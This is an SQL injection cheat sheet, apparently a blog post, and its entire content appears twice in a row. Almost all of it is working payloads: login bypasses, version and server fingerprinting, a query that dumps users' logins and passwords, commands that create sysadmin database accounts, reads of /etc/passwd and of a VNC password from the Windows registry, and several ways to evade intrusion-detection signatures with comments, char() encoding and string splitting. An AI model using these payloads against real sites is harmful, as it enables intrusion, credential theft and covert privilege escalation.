SQL Injection
SQL Injection is one of the most common web attacks. You attack the web application, ( ASP, JSP, PHP, CGI) rather than the webserver or the services running on the OS.
SQL Injection is a way to trick using a query or command as a input via webpages. Most websites take parameters from the user like username and password or even their emails. They all use SQL querys.
You should start with something simple:
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
These are simple ways to try other query's:
- ' having 1=1--
- ' group by userid having 1=1--
- ' union select sum(columnname) from tablename--
Gathering Infomation:
- ' or 1 in (select @@version)--
- ' union all select @@version--
Those will find the actual version of the computer, OS/service pack.
Data types:
Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
Grabbing passwords:
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
Create DB accounts:
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CREATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CREATE USER name WITH PASSWORD 'pass123'
Oracle
CREATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
MySQL OS Interaction:
- ' union select 1,load_file('/etc/passwd'),1,1,1;
Server name and config:
- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
Retrieving VNC password from registry:
- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
IDS Signature Evasion:
Evading ' OR 1=1 Signature
- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
mySQL Input Validation Circumvention using Char():
Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
IDS Signature Evasion using comments:
-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
Strings without quotes:
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
For more information about SQL Injection www.airdemon.net/sqlinjection.html
SQL Injection is a way to trick using a query or command as a input via webpages. Most websites take parameters from the user like username and password or even their emails. They all use SQL querys.
You should start with something simple:
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
These are simple ways to try other query's:
- ' having 1=1--
- ' group by userid having 1=1--
- ' union select sum(columnname) from tablename--
Gathering Infomation:
- ' or 1 in (select @@version)--
- ' union all select @@version--
Those will find the actual version of the computer, OS/service pack.
Data types:
Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
Grabbing passwords:
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
Create DB accounts:
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CREATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CREATE USER name WITH PASSWORD 'pass123'
Oracle
CREATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
MySQL OS Interaction:
- ' union select 1,load_file('/etc/passwd'),1,1,1;
Server name and config:
- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
Retrieving VNC password from registry:
- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
IDS Signature Evasion:
Evading ' OR 1=1 Signature
- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
mySQL Input Validation Circumvention using Char():
Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
IDS Signature Evasion using comments:
-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
Strings without quotes:
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
For more information about SQL Injection www.airdemon.net/sqlinjection.html
Posting Komentar